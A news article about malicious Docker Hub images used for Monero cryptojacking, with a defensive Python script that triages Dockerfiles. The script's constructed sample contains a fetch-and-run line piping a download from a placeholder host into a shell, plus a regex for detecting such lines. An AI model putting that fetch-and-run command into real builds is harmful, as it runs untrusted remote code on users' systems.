Docker containers make money for cryptomining criminals
Seventeen Docker containers were used by cryptomining criminals to make $90,000 in 30 days. The figure may seem tame compared to some of the larger paydays that cryptojackers have earned, but researchers warn that containers are shaping up to be the next ripe target for criminals. The malicious Docker images were pulled from the Docker Hub image repository. Researchers cannot determine for sure how many times the rogue containers were used by Docker Hub users, but they estimate that the 17 images were downloaded 5 million times during the year they were available.
All 17 were removed from Docker Hub on May 10 by Docker, after Fortinet found the containers and published a report on the images being used to mine cryptocurrency. Fortinet was able to tie the compromised containers back to one hacker, thanks to a shared Monero wallet. By pushing malicious images to the Docker Hub registry and having victims pull them onto their own systems, the hacker was able to mine 544.74 Monero, which is equal to $90,000.
The report went deeper into the malicious containers found by Fortinet and the larger Docker threat landscape. Of the 17 malicious containers, researchers found nine had the mining software pre-installed. The others were intentionally left misconfigured and available on Docker Hub, allowing the hacker access to the instances at a later date. Each of the images advertised itself as a tool for a popular software product such as Apache Tomcat, MySQL or Cron. The growing number of publicly accessible misconfigured orchestration platforms like Kubernetes allows hackers to create fully automated tools that force these platforms to mine Monero. Kubernetes is a container orchestration system with tools that automate the deployment, updating and monitoring of containers.
Using public repositories to hide malicious content in plain sight is nothing new. Third-party code repositories such as GitHub, Bitbucket and NuGet Gallery are essential tools to help developers find pre-existing code that adds functionality for their software projects without having to reinvent the wheel. Similarly, Docker Hub offers developers time-saving functions. Both can be targeted by rogue developers.
Researchers stated that the increased attention by hackers to publicly accessible orchestration platforms such as Kubernetes began at the start of 2018, when attackers moved on from Amazon Elastic Compute Cloud exploits to container-specific exploits. Some of those attacks took advantage of hundreds of misconfigured Kubernetes administration consoles. One high-profile attack targeted carmaker Tesla. The hackers had infiltrated Tesla's Kubernetes console, which was not password protected. Within one Kubernetes pod, access credentials to Tesla's AWS environment were exposed; that environment contained an Amazon S3 bucket holding sensitive data such as telemetry. In addition to the data exposure, the hackers were performing cryptomining from within one of Tesla's Kubernetes pods.
Docker does offer tools to its enterprise customers to protect against rogue containers. Docker had previously offered security scanning for Docker Hub users, but stopped the free offering in March. There are also numerous free Docker security and scanning tools to choose from. The process of pulling a Docker image should be transparent and easy to follow. First, look through the Dockerfile to find out what the FROM and ENTRYPOINT instructions are and what the container does. Second, prefer images built with Docker automated builds, because automated builds give you traceability between the source of the Dockerfile, the version of the image, and the actual build output. Developers need to focus on similar container traceability to protect their cloud instances.
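The "look through the Dockerfile for FROM and ENTRYPOINT" step above is easy to automate as a pre-pull triage. The script below is an added example, not code from the article or from Fortinet or Docker: it parses a Dockerfile, records the base images and the ENTRYPOINT/CMD, and raises findings a reviewer would care about in this story's context (a base image not pinned to a digest, a namespaced image that is not an official library image, and a RUN/ENTRYPOINT/CMD that pipes a download straight into a shell). Both Dockerfiles in it are constructed samples; the `example.invalid` host and the all-zero digest are placeholders, and the "official image has no slash" rule is a heuristic that does not account for fully qualified `docker.io/library/...` names.

```python
"""Static triage of a Dockerfile before pulling or running the image it builds.

Added example (not from the article). Heuristic checks only; a clean report
does not prove an image is safe, it just means these particular red flags
are absent.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class ImageReport:
    base_images: List[str] = field(default_factory=list)
    entrypoint: Optional[str] = None
    cmd: Optional[str] = None
    findings: List[str] = field(default_factory=list)


def instructions(dockerfile: str) -> List[str]:
    """Return logical instructions: comments dropped, backslash continuations joined."""
    out, buf = [], ""
    for raw in dockerfile.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):
            buf += line[:-1].rstrip() + " "
            continue
        out.append((buf + line).strip())
        buf = ""
    if buf:
        out.append(buf.strip())
    return out


# "curl ... | sh" / "wget ... | bash" style download-and-execute in one step.
REMOTE_EXEC = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|da)?sh\b")


def triage(dockerfile: str) -> ImageReport:
    rep = ImageReport()
    for instr in instructions(dockerfile):
        keyword, _, args = instr.partition(" ")
        keyword, args = keyword.upper(), args.strip()
        if keyword == "FROM":
            # Skip flags such as --platform=...; first remaining token is the image.
            tokens = [t for t in args.split() if not t.startswith("--")]
            image = tokens[0]
            rep.base_images.append(image)
            if image != "scratch":
                repo = image.split("@")[0].split(":")[0]  # strip digest, then tag
                if "@sha256:" not in image:
                    rep.findings.append(f"FROM {image}: base image not pinned to a digest")
                if "/" in repo:  # heuristic: library images are a bare name
                    rep.findings.append(f"FROM {image}: namespaced image, check the publisher")
        elif keyword in ("RUN", "ENTRYPOINT", "CMD"):
            if keyword == "ENTRYPOINT":
                rep.entrypoint = args
            elif keyword == "CMD":
                rep.cmd = args
            if REMOTE_EXEC.search(args):
                rep.findings.append(f"{keyword} pipes a download straight into a shell: {args}")
    return rep


# Constructed sample: advertised as a Tomcat helper, fetches and runs a remote script.
SUSPECT = """\
# Constructed sample, not a real Docker Hub image.
FROM tomcat:8.5
RUN apt-get update && \\
    apt-get install -y curl
RUN curl -fsSL http://example.invalid/setup.sh | sh
ENTRYPOINT ["/bin/sh", "-c", "/opt/bin/start.sh"]
"""

# Constructed counterpart: digest-pinned base (placeholder digest), startup script copied in.
HARDENED = """\
# Constructed sample; the digest below is a placeholder, not a real one.
FROM tomcat:8.5@sha256:0000000000000000000000000000000000000000000000000000000000000000
COPY start.sh /opt/bin/start.sh
ENTRYPOINT ["/opt/bin/start.sh"]
"""

if __name__ == "__main__":
    for label, text in (("suspect", SUSPECT), ("hardened", HARDENED)):
        rep = triage(text)
        print(f"{label}: FROM={rep.base_images} ENTRYPOINT={rep.entrypoint}")
        for finding in rep.findings:
            print("  -", finding)
```

Run it against the Dockerfile behind an image before `docker pull`; for automated builds the Dockerfile is linked from the Docker Hub page, which is exactly the traceability the paragraph above argues for.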